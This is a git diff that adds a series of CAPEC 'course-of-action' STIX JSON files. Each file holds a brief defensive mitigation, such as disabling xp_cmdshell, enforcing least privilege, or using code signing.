a/capec/course-of-action/course-of-action--54f22236-6457-4a31-a58b-f99f393d8892.json b/capec/course-of-action/course-of-action--54f22236-6457-4a31-a58b-f99f393d8892.json new file mode 100644 index 0000000000..f6ba9d9838 --- /dev/null +++ b/capec/course-of-action/course-of-action--54f22236-6457-4a31-a58b-f99f393d8892.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--4a4e3aac-6eb2-45bc-812b-1ccf52019c16", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--54f22236-6457-4a31-a58b-f99f393d8892", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-19-0", + "description": "Use browser technologies that do not allow client side scripting.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--55095dcf-2954-4dc8-9c3a-2038d5ffbf2a.json b/capec/course-of-action/course-of-action--55095dcf-2954-4dc8-9c3a-2038d5ffbf2a.json new file mode 100644 index 0000000000..da57b291cb --- /dev/null +++ b/capec/course-of-action/course-of-action--55095dcf-2954-4dc8-9c3a-2038d5ffbf2a.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--f8d818fd-502d-437d-a074-6542666be522", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--55095dcf-2954-4dc8-9c3a-2038d5ffbf2a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "coa-407-0", + "description": "An organization should provide regular, robust cybersecurity training to its employees to prevent successful social engineering attacks.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--55337545-1e96-4f8c-b0e5-181084b3a3e8.json b/capec/course-of-action/course-of-action--55337545-1e96-4f8c-b0e5-181084b3a3e8.json new file mode 100644 index 0000000000..b422806852 --- /dev/null +++ b/capec/course-of-action/course-of-action--55337545-1e96-4f8c-b0e5-181084b3a3e8.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--51f41faa-65bd-4556-8b52-db743499766e", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--55337545-1e96-4f8c-b0e5-181084b3a3e8", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-94-2", + "description": "Use Strong mutual authentication to always fully authenticate both ends of any communications channel.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--557e63a0-6f2a-4ffd-baf2-a6dc676a7156.json b/capec/course-of-action/course-of-action--557e63a0-6f2a-4ffd-baf2-a6dc676a7156.json new file mode 100644 index 0000000000..554857fa16 --- /dev/null +++ b/capec/course-of-action/course-of-action--557e63a0-6f2a-4ffd-baf2-a6dc676a7156.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--d170ae0d-6e10-4c67-b08d-a4c5c93a9ad8", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--557e63a0-6f2a-4ffd-baf2-a6dc676a7156", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "coa-108-0", + "description": "Disable MSSQL xp_cmdshell directive on the database", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--561921de-6d1a-4bdf-aa42-2fde54309463.json b/capec/course-of-action/course-of-action--561921de-6d1a-4bdf-aa42-2fde54309463.json new file mode 100644 index 0000000000..da0a5d7374 --- /dev/null +++ b/capec/course-of-action/course-of-action--561921de-6d1a-4bdf-aa42-2fde54309463.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--12c6f61e-7342-4067-a47c-b3cae1b78ce3", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--561921de-6d1a-4bdf-aa42-2fde54309463", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-623-0", + "description": "None are known.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--5630615d-5b7f-4130-a543-f6c837c62b7a.json b/capec/course-of-action/course-of-action--5630615d-5b7f-4130-a543-f6c837c62b7a.json new file mode 100644 index 0000000000..e6f617eb60 --- /dev/null +++ b/capec/course-of-action/course-of-action--5630615d-5b7f-4130-a543-f6c837c62b7a.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--8df0c23a-e197-4095-8377-56774e348ef6", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--5630615d-5b7f-4130-a543-f6c837c62b7a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-24-4", + "description": "Design: Use an abstraction library to abstract away risky APIs. Not a complete solution.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--563ecada-f5a4-4f5b-952d-7281408f06c8.json b/capec/course-of-action/course-of-action--563ecada-f5a4-4f5b-952d-7281408f06c8.json new file mode 100644 index 0000000000..456d149de2 --- /dev/null +++ b/capec/course-of-action/course-of-action--563ecada-f5a4-4f5b-952d-7281408f06c8.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--afb8a023-fcb7-415d-b4b1-5a231114cb9b", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--563ecada-f5a4-4f5b-952d-7281408f06c8", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-141-1", + "description": "Implementation: Listens for query replies on a network, and sends a notification via email when an entry changes.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--5670943e-0510-475a-bcb5-8a62e354d5d3.json b/capec/course-of-action/course-of-action--5670943e-0510-475a-bcb5-8a62e354d5d3.json new file mode 100644 index 0000000000..ffe9e78e80 --- /dev/null +++ b/capec/course-of-action/course-of-action--5670943e-0510-475a-bcb5-8a62e354d5d3.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--237c63c8-37e5-4263-a833-da45cf3f4b76", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--5670943e-0510-475a-bcb5-8a62e354d5d3", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-120-2", + "description": "When client input is required from web-based forms, avoid using the \"GET\" method to submit data, as the method causes the form data to be appended to the URL and is easily manipulated. Instead, use the \"POST method whenever possible.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--56ee7284-adfd-41b9-b592-5092da42b889.json b/capec/course-of-action/course-of-action--56ee7284-adfd-41b9-b592-5092da42b889.json new file mode 100644 index 0000000000..02b8e34b43 --- /dev/null +++ b/capec/course-of-action/course-of-action--56ee7284-adfd-41b9-b592-5092da42b889.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--34bf8b65-c561-4d8d-a1a8-1bbefbc7aad5", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--56ee7284-adfd-41b9-b592-5092da42b889", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-24-2", + "description": "Pre-design through Build: Compiler-based canary mechanisms such as StackGuard, ProPolice and the Microsoft Visual Studio /GS flag. Unless this provides automatic bounds checking, it is not a complete solution.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--581e502e-b7d2-4e2e-abf8-22eaf3ffe9db.json b/capec/course-of-action/course-of-action--581e502e-b7d2-4e2e-abf8-22eaf3ffe9db.json new file mode 100644 index 0000000000..f13dff969f --- /dev/null +++ b/capec/course-of-action/course-of-action--581e502e-b7d2-4e2e-abf8-22eaf3ffe9db.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--449f3a19-29e9-4b46-bfdd-4b6dc4f47504", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--581e502e-b7d2-4e2e-abf8-22eaf3ffe9db", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-207-1", + "description": "Design: Ship client-side application with integrity checks (code signing) when possible.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--58fa30b6-7537-4d57-a211-ce13b21f2150.json b/capec/course-of-action/course-of-action--58fa30b6-7537-4d57-a211-ce13b21f2150.json new file mode 100644 index 0000000000..c56e0b68f4 --- /dev/null +++ b/capec/course-of-action/course-of-action--58fa30b6-7537-4d57-a211-ce13b21f2150.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--9c65a87d-2b6e-4cfa-8a81-60db0f70aad8", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--58fa30b6-7537-4d57-a211-ce13b21f2150", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-459-0", + "description": "Certification Authorities need to stop using the weak collision prone MD5 hashing algorithm to hash the certificates that they are about to sign. Instead they should be using stronger hashing functions such as SHA-256 or SHA-512.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--59125c5d-d363-4939-9367-09200b835952.json b/capec/course-of-action/course-of-action--59125c5d-d363-4939-9367-09200b835952.json new file mode 100644 index 0000000000..39b3703919 --- /dev/null +++ b/capec/course-of-action/course-of-action--59125c5d-d363-4939-9367-09200b835952.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--503db8fa-74e3-4193-a359-d038e52ba0fd", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--59125c5d-d363-4939-9367-09200b835952", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-78-2", + "description": "Be aware of the threat of alternative method of data encoding.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--59ede157-2056-4a52-af14-09cf093ca618.json b/capec/course-of-action/course-of-action--59ede157-2056-4a52-af14-09cf093ca618.json new file mode 100644 index 0000000000..b386b7d8b6 --- /dev/null +++ b/capec/course-of-action/course-of-action--59ede157-2056-4a52-af14-09cf093ca618.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--3c7608df-fa02-4fd0-b782-c1b39776ea33", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--59ede157-2056-4a52-af14-09cf093ca618", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-32-9", + "description": "Implementation: Privileges are constrained, if a script is loaded, ensure system runs in chroot jail or other limited authority mode", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--59f6f5cc-aab7-46d0-bf72-761b5ef7c45d.json b/capec/course-of-action/course-of-action--59f6f5cc-aab7-46d0-bf72-761b5ef7c45d.json new file mode 100644 index 0000000000..85803617a3 --- /dev/null +++ b/capec/course-of-action/course-of-action--59f6f5cc-aab7-46d0-bf72-761b5ef7c45d.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--3b3a2825-8080-41b1-a454-2ef93a17a526", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--59f6f5cc-aab7-46d0-bf72-761b5ef7c45d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-01-09T00:00:00.000Z", + "name": "coa-126-1", + "description": "Design: Enforce principle of least privilege.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--5a311df1-0f52-43b4-bd8c-2213d2e8213e.json b/capec/course-of-action/course-of-action--5a311df1-0f52-43b4-bd8c-2213d2e8213e.json new file mode 100644 index 0000000000..4a429a2893 --- /dev/null +++ b/capec/course-of-action/course-of-action--5a311df1-0f52-43b4-bd8c-2213d2e8213e.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--397491d4-c0f7-46e5-bf46-97a87768563c", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--5a311df1-0f52-43b4-bd8c-2213d2e8213e", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-482-0", + "description": "To mitigate this type of an attack, an organization can monitor incoming packets and look for patterns in the TCP traffic to determine if the network is under an attack. The potential target may implement a rate limit on TCP SYN messages which would provide limited capabilities while under attack.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--5a3e396c-2570-4ed5-9da8-0583ffc0cb73.json b/capec/course-of-action/course-of-action--5a3e396c-2570-4ed5-9da8-0583ffc0cb73.json new file mode 100644 index 0000000000..064aed59e4 --- /dev/null +++ b/capec/course-of-action/course-of-action--5a3e396c-2570-4ed5-9da8-0583ffc0cb73.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--b05d7031-0929-4d45-a4f7-c7ac36cf8795", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--5a3e396c-2570-4ed5-9da8-0583ffc0cb73", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-07-31T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-634-0", + "description": "Prevent unknown code from executing on a system through whitelisting policy.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--5a524e70-22d0-4145-bb4b-534316b6ba77.json b/capec/course-of-action/course-of-action--5a524e70-22d0-4145-bb4b-534316b6ba77.json new file mode 100644 index 0000000000..67ebeb3eae --- /dev/null +++ b/capec/course-of-action/course-of-action--5a524e70-22d0-4145-bb4b-534316b6ba77.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--d73c96cd-510a-4a4c-8308-b17c005b0ff3", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--5a524e70-22d0-4145-bb4b-534316b6ba77", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-606-0", + "description": "Use of hardened baseband firmware on retransmission device to detect and prevent the use of weak cellular encryption.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--5a6c793b-b5f6-457d-b758-59fb951a3ac3.json b/capec/course-of-action/course-of-action--5a6c793b-b5f6-457d-b758-59fb951a3ac3.json new file mode 100644 index 0000000000..4e25df0643 --- /dev/null +++ b/capec/course-of-action/course-of-action--5a6c793b-b5f6-457d-b758-59fb951a3ac3.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--8472f504-8112-4ffc-aaaf-9dbf2f519bdb", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--5a6c793b-b5f6-457d-b758-59fb951a3ac3", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-5-1", + "description": "Use strong access control such as two factor access control for administrative access to the switch", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--5a8152fa-c01e-4c85-b859-5cf3fcd7e926.json b/capec/course-of-action/course-of-action--5a8152fa-c01e-4c85-b859-5cf3fcd7e926.json new file mode 100644 index 0000000000..103e7ada5b --- /dev/null +++ b/capec/course-of-action/course-of-action--5a8152fa-c01e-4c85-b859-5cf3fcd7e926.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--319facc5-35ab-47ba-a4e9-20984a7761ab", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--5a8152fa-c01e-4c85-b859-5cf3fcd7e926", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-199-3", + "description": "Implementation: Ensure all content coming from the client is using the same encoding; if not, the server-side application must canonicalize the data before applying any filtering.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--5ab5bb92-9b0c-4d06-a27f-392c82b316c5.json b/capec/course-of-action/course-of-action--5ab5bb92-9b0c-4d06-a27f-392c82b316c5.json new file mode 100644 index 0000000000..9ef89bfa37 --- /dev/null +++ b/capec/course-of-action/course-of-action--5ab5bb92-9b0c-4d06-a27f-392c82b316c5.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--ec449217-df7d-4c26-845d-1c55b5d8fa52", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--5ab5bb92-9b0c-4d06-a27f-392c82b316c5", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-199-2", + "description": "Implementation: Ensure all content that is delivered to client is sanitized against an acceptable content specification.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--5b853df1-149c-4ea6-a60a-aee20161f9a8.json b/capec/course-of-action/course-of-action--5b853df1-149c-4ea6-a60a-aee20161f9a8.json new file mode 100644 index 0000000000..d001825ae6 --- /dev/null +++ b/capec/course-of-action/course-of-action--5b853df1-149c-4ea6-a60a-aee20161f9a8.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--39539da5-bb36-461c-805f-8e47764e1de0", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--5b853df1-149c-4ea6-a60a-aee20161f9a8", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "coa-100-4", + "description": "Use OS-level preventative functionality. Not a complete solution.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--5c1f4869-4745-4313-96aa-60314bb85b7d.json b/capec/course-of-action/course-of-action--5c1f4869-4745-4313-96aa-60314bb85b7d.json new file mode 100644 index 0000000000..143139e2eb --- /dev/null +++ b/capec/course-of-action/course-of-action--5c1f4869-4745-4313-96aa-60314bb85b7d.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--d537e16b-2ff4-4f5a-8140-8aa558f78fee", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--5c1f4869-4745-4313-96aa-60314bb85b7d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2015-12-07T00:00:00.000Z", + "name": "coa-44-2", + "description": "Design: Static code analysis", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--5c9bdb74-17c0-4ad3-a2e5-343766003d65.json b/capec/course-of-action/course-of-action--5c9bdb74-17c0-4ad3-a2e5-343766003d65.json new file mode 100644 index 0000000000..10a214f4e8 --- /dev/null +++ b/capec/course-of-action/course-of-action--5c9bdb74-17c0-4ad3-a2e5-343766003d65.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--01506c85-7fd8-4784-8f49-bb7b2d928526", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--5c9bdb74-17c0-4ad3-a2e5-343766003d65", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2015-11-09T00:00:00.000Z", + "name": "coa-21-2", + "description": "Implementation: If the session identifier is used for authentication, such as in the so-called single sign on use cases, then ensure that it is protected at the same level of assurance as authentication tokens.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--5cccb5c4-5871-41f4-a89c-e04392838811.json b/capec/course-of-action/course-of-action--5cccb5c4-5871-41f4-a89c-e04392838811.json new file mode 100644 index 0000000000..239be3e90b --- /dev/null +++ b/capec/course-of-action/course-of-action--5cccb5c4-5871-41f4-a89c-e04392838811.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--f711eeea-0e17-4c13-b40a-0ab2121539c2", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--5cccb5c4-5871-41f4-a89c-e04392838811", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-275-1", + "description": "Implementation: Reject HTTP request with a malicious Host header.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--5d27eaef-7db0-4804-958c-8b5624bbd8af.json b/capec/course-of-action/course-of-action--5d27eaef-7db0-4804-958c-8b5624bbd8af.json new file mode 100644 index 0000000000..bba71e40ac --- /dev/null +++ b/capec/course-of-action/course-of-action--5d27eaef-7db0-4804-958c-8b5624bbd8af.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--71b2ebd1-4edb-4ca0-8eef-27f81d9eb8df", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--5d27eaef-7db0-4804-958c-8b5624bbd8af", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-132-1", + "description": "Implementation: Use randomly generated file names for temporary files. Give the files restrictive permissions.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--5d6a950c-d719-4695-ac9a-e050f39c65e6.json b/capec/course-of-action/course-of-action--5d6a950c-d719-4695-ac9a-e050f39c65e6.json new file mode 100644 index 0000000000..ed22087fe4 --- /dev/null +++ b/capec/course-of-action/course-of-action--5d6a950c-d719-4695-ac9a-e050f39c65e6.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--05918caa-6812-40cb-a28f-5cf561ac0f3d", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--5d6a950c-d719-4695-ac9a-e050f39c65e6", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-75-3", + "description": "Implementation: Enforce audit logging on code and configuration promotion procedures.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--5dad1672-a750-4909-8d3a-f583109c6a7b.json b/capec/course-of-action/course-of-action--5dad1672-a750-4909-8d3a-f583109c6a7b.json new file mode 100644 index 0000000000..fbd398afa2 --- /dev/null +++ b/capec/course-of-action/course-of-action--5dad1672-a750-4909-8d3a-f583109c6a7b.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--5afc83aa-b40e-415e-ae71-e793e05f2f53", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--5dad1672-a750-4909-8d3a-f583109c6a7b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-303-0", + "description": "Employ a robust network defensive posture that includes a managed IDS/IPS.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--5db3f6ef-aad5-4b2f-90fc-db232791760b.json b/capec/course-of-action/course-of-action--5db3f6ef-aad5-4b2f-90fc-db232791760b.json new file mode 100644 index 0000000000..94194aa5c0 --- /dev/null +++ b/capec/course-of-action/course-of-action--5db3f6ef-aad5-4b2f-90fc-db232791760b.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--335a5d39-497c-44aa-b3c0-03079fd8f7c3", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--5db3f6ef-aad5-4b2f-90fc-db232791760b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "name": "coa-227-0", + "description": "Potential mitigations include requiring a unique login for each resource request, constraining local unprivileged access by disallowing simultaneous engagements of the resource, or limiting access to the resource to one access per IP address. In such scenarios, the adversary would have to increase engagements either by launching multiple sessions manually or programmatically to counter such defenses.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--5eb18362-1cac-41e2-ad66-e4887a473ab0.json b/capec/course-of-action/course-of-action--5eb18362-1cac-41e2-ad66-e4887a473ab0.json new file mode 100644 index 0000000000..dc4a4017e1 --- /dev/null +++ b/capec/course-of-action/course-of-action--5eb18362-1cac-41e2-ad66-e4887a473ab0.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--58adb4fd-dd64-4294-849e-712272e27671", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--5eb18362-1cac-41e2-ad66-e4887a473ab0", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-07-31T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-634-1", + "description": "Patch installed applications as soon as new updates become available.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--5efe162c-e441-40c4-8bbb-da7c7b9aa0d0.json b/capec/course-of-action/course-of-action--5efe162c-e441-40c4-8bbb-da7c7b9aa0d0.json new file mode 100644 index 0000000000..bcaa8afb00 --- /dev/null +++ b/capec/course-of-action/course-of-action--5efe162c-e441-40c4-8bbb-da7c7b9aa0d0.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--700367d0-20f5-4066-b94a-afea441a2b39", + "spec_version": "2.0", + "objects": [ + { + "type": 